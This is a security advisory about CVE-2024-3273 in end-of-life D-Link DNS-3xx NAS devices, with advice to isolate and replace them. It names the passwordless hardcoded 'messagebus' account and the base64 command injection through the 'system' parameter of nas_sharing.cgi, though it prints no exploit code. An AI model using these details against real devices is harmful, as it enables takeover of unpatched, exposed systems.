End-of-life D-Link NAS devices have a backdoor account, over 90k exposed and vulnerable
Take action: If you are using D-Link NAS DNS-3xx series, check whether it's in the list of vulnerable devices, isolate it from the internet and plan to replace it as soon as possible. Because it's probably vulnerable and it will be hacked.
Learn More
A security researcher 'Netsecfish' has identified a significant vulnerability in several models of D-Link Network Attached Storage (NAS) devices. This vulnerability, tracked as CVE-2024-3273, combines an arbitrary command injection issue with a hardcoded backdoor account.
The affected D-Link NAS device models include:
- DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
- DNS-325 Version 1.01
- DNS-327L Version 1.09, Version 1.00.0409.2013
- DNS-340L Version 1.08
Search on Shodan indicates that over 90,000 vulnerable devices are active and exposed on the internet.
The flaw exists within the '/cgi-bin/nas_sharing.cgi' script, specifically within its HTTP GET Request Handler component. The issues enable unauthorized remote command execution through combination of a hardcoded account with the username "messagebus" (and no password) and a command injection vulnerability via the "system" parameter. Attackers can exploit this by appending a base64-encoded command to the "system" parameter in an HTTP GET request, resulting in the execution of arbitrary commands on the vulnerable NAS device.
D-Link states that these NAS devices are no longer supported due to reaching their end-of-life (EOL) status and no patches will be released to address this vulnerability. D-Link advised users to retire these outdated products and replace them with newer models that receive regular firmware updates.
D-Link has published a security bulletin and established a dedicated support page for legacy devices sold in the US which do not auto-update, urging users to apply the latest available updates. However, these measures will not mitigate CVE-2024-3273.
